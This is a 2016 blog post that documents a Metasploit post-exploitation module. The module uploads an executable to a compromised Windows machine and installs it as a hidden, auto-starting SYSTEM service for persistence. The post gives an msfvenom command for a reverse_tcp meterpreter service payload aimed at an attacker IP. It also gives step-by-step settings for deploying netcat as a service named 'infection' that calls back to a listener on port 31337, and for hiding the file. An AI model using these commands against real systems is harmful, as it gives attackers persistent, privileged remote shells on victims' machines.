Sunday 13 November 2016

deploy_service_payload - Post MSF module For Deploy A Persistence Service Payload

[What Does This Module Do?] 
deploy_service_payload.rb uploads your payload.exe to target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME). 

The service will auto-start with windows with Local/System privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "WARNING: This
module only supports .exe executables to upload".

[NOTE]

BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe

--WARNING: This module will not delete the payload deployed"
--WARNING: Note that only executables explicitly written to interface with the Service Control
--Manager should be installed this way. While SC will happily accept a regular non-service binary,
   you will receive the fatal Error 1053 when you attempt to start the service, please read the follow
--Article: How to Run Any Program as a Background Service in Windows

[INFO]



[INSTALLATION]

1* Download Module from {HERE}
2* Copy the ruby file in 
/{path}/metesploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue command "reload_all" to reload paths.
4* use post/windows/manage/deploy_service_payload

[ADVANCED OPTIONS]



[USAGE]

NOTE: Im the follow example we are going to deploy a NETCAT executable on attacker machine (Its not mandatory the use of netcat [ nc.exe ], Default its to deploy a built-in service executable).

To be able to deploy a NETCAT client we need to activate module options 'USE_NETCAT'  | 'NC_LHOST' | 'NC_LPORT' and manually set a NETCAT lhandler to recibe the remote service connection...


-- DEPLOYING PAYLOAD :

1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1

{Opening netcat Listener on Desired Port to recibe remote service connection}

$ sudo nc -lvp 31337

Expected Results :  


-- HIDING PAYLOAD :

1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1

Expected Results :


-- CHECKING SERVICE STATUS :

1* set SERVICE_STATUS true
2* set SERVICE_NAME infection
3* set SESSION 1

Expected Results :


-- DELETING REMOTE SERVICE : :

1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed"
Expected Results :


[VIDEO DEMO]




[Credits]

Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya